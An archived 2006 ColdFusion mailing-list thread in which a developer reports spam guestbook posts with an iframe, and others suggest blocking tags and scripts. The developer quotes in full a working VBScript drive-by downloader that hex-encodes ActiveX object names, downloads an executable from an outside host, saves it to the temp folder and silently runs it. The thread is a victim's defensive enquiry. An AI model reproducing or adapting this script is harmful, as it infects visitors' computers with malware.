You should have your guestbook not allow tags, or at least not allow javascript.
Russ -----Original Message----- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: 27 October 2006 23:37 To: CF-Talk Subject: RE: weird VB exploit Yep, that's what happened. All I did was go and view my guestbook and my antivirus went nuts. What scares the heck out of me is that MS IE was going to let the VBS execute those files without nary a warning. [Insert obligatory FF > IE comments here from the peanut gallery] That's why I thought maybe I just didn't have all the security patches installed. ~Brad -----Original Message----- From: Munson, Jacob [mailto:[EMAIL PROTECTED] Sent: Friday, October 27, 2006 5:04 PM To: CF-Talk Subject: RE: weird VB exploit You lost me. Are /you/ trying to run this VB script? If not, why do you care about /your/ version of IE, it's the spammers browser (or spam tool) that matters. Ok, after a reread, I think I understand better. The spammer posted some code that included an iframe. When you load your guestbook in IE, you get a bunch of virus warnings. Do I have it right? > -----Original Message----- > From: Brad Wood [mailto:[EMAIL PROTECTED] > Sent: Friday, October 27, 2006 1:14 PM > To: CF-Talk > Subject: weird VB exploit > > Hey guys, I just got some spam posts on my guestbook which include an > iframe. Inside the iframe a page is called which, after calling about > 80 unescape JavaScript functions tries to execute the following VB > code. > I realized it when my antivirus started going nuts telling me about > executable files it was trying run. > > > > Do I need a patch for IE? (IE 6.0 on Windows 2000 SP4) I didn't think > a web page could execute arbitrary files from a web server. > > > > <script language="VBScript"> > > On Error Resume Next > > Function h2s(s) > > Dim i > > For i = 1 To Len(s) Step 2 > > h2s = h2s & Chr("&" & "H" & Mid(s, i, 2)) > > Next > > End Function > > Const sClassID = > "636C7369643A42443936433535362D363541332D313144302D393833412D3 > 0304330344 > 6433239453336" > > Const sItem_1 = "41646F64622E53747265616D" > > Const sItem_2 = > "536372697074696E672E46696C6553797374656D4F626A656374" > > Const sItem_3 = "4D6963726F736F66742E584D4C48545450" > > Const sItem_4 = "5368656C6C2E4170706C69636174696F6E" > > sFileURL = "http://money24online.com/file.exe"; > > sFileName = "thw_expl.exe" > > Set DF = Document.createElement("object") > > Call DF.SetAttribute("classid", h2s(sClassID)) > > Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString) > > Set FS = DF.CreateObject(h2s(sItem_2), vbNullString) > > Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString) > > Call xml_http.Open("GET", sFileURL, False) > > Call xml_http.Send > > AdoSream.Type = 1 > > Set tmp_path = FS.GetSpecialFolder(2) > > sFilePath = FS.BuildPath(tmp_path, sFileName) > > Call AdoSream.Open > > Call AdoSream.Write(xml_http.responseBody) > > Call AdoSream.SaveToFile(sFilePath, 2) > > Call AdoSream.Close > > Set Q = df.CreateObject(h2s(sItem_4), vbNullString) > > Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0) > > </script> > > > > ~Brad > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:258344 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
